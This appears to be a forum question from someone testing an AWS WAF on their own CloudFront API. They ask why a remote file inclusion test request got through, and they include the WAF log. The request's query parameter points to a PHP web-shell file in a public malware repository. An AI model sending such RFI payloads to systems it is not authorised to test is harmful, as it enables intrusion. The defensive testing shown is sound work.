I'm currently trying to setup a Cloudfront distribution with a web ACL (WAF). I enabled the AWS managed rule called AWSManagedRulesCommonRuleSet (documentation to this rule can be found here: https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html).
I'm testing a Remote File Inclusion, for which I would expect my query to be blocked by the WAF. Unfortunately, my request still goes through. My query is GET https://api.{mywebsite}.com/?test=https%3A%2F%2Fraw.githubusercontent.com%2Fmarcocesarato%2FPHP-Malware-Collection%2Fmaster%2Fclassic%2Fsimattacker.php, so a simple GET query to https://api.{mywebsite}.com with a query parameter test=https://raw.githubusercontent.com/marcocesarato/PHP-Malware-Collection/master/classic/simattacker.php
I enabled the log for the WAF, here you can see that my query is not block, despite the RFI present.
{
"timestamp": 1697798175056,
"formatVersion": 1,
"webaclId": "arn:aws:wafv2:us-east-1:249461922481:global/webacl/waf-demo/ce82b689-0a46-4018-a992-80f6d03a1ca3",
"terminatingRuleId": "Default_Action",
"terminatingRuleType": "REGULAR",
"action": "ALLOW",
"terminatingRuleMatchDetails": [],
"httpSourceName": "CF",
"httpSourceId": "E2HC5UK2JK9WVG",
"ruleGroupList": [
{
"ruleGroupId": "AWS#AWSManagedRulesPHPRuleSet",
"terminatingRule": null,
"nonTerminatingMatchingRules": [],
"excludedRules": null,
"customerConfig": null
},
{
"ruleGroupId": "AWS#AWSManagedRulesLinuxRuleSet",
"terminatingRule": null,
"nonTerminatingMatchingRules": [],
"excludedRules": null,
"customerConfig": null
},
{
"ruleGroupId": "AWS#AWSManagedRulesKnownBadInputsRuleSet",
"terminatingRule": null,
"nonTerminatingMatchingRules": [],
"excludedRules": null,
"customerConfig": null
},
{
"ruleGroupId": "AWS#AWSManagedRulesCommonRuleSet",
"terminatingRule": null,
"nonTerminatingMatchingRules": [],
"excludedRules": null,
"customerConfig": null
},
{
"ruleGroupId": "AWS#AWSManagedRulesUnixRuleSet",
"terminatingRule": null,
"nonTerminatingMatchingRules": [],
"excludedRules": null,
"customerConfig": null
},
{
"ruleGroupId": "AWS#AWSManagedRulesSQLiRuleSet",
"terminatingRule": null,
"nonTerminatingMatchingRules": [],
"excludedRules": null,
"customerConfig": null
}
],
"rateBasedRuleList": [
{
"rateBasedRuleId": "arn:aws:wafv2:us-east-1:249461922481_MANAGED:global/ipset/ce82b689-0a46-4018-a992-80f6d03a1ca3_d03fd8aa-b178-4da6-9da3-1b3a6511b176_IPV4/d03fd8aa-b178-4da6-9da3-1b3a6511b176",
"rateBasedRuleName": "limit",
"limitKey": "IP",
"maxRateAllowed": 100,
"limitValue": "{redacted}"
}
],
"nonTerminatingMatchingRules": [],
"requestHeadersInserted": null,
"responseCodeSent": null,
"httpRequest": {
"clientIp": "213.49.129.107",
"country": "BE",
"headers": [
{
"name": "host",
"value": "api.{mywebsite}.com"
},
{
"name": "user-agent",
"value": "insomnia/8.3.0"
},
{
"name": "accept",
"value": "*/*"
},
{
"name": "content-length",
"value": "0"
}
],
"uri": "/",
"args": "test=https%3A%2F%2Fraw.githubusercontent.com%2Fmarcocesarato%2FPHP-Malware-Collection%2Fmaster%2Fclassic%2Fsimattacker.php",
"httpVersion": "HTTP/2.0",
"httpMethod": "GET",
"requestId": "45Jf2TK56hWIioDaQJgDVDFVgUVmULWq2OqRMbhmPQjXQW8lFYMNrA=="
},
"ja3Fingerprint": "4ea056e63b7910cbf543f0c095064dfe"
}
Could you help me understand what happens ? Thanks
AWS OFFICIALUpdated 2 years ago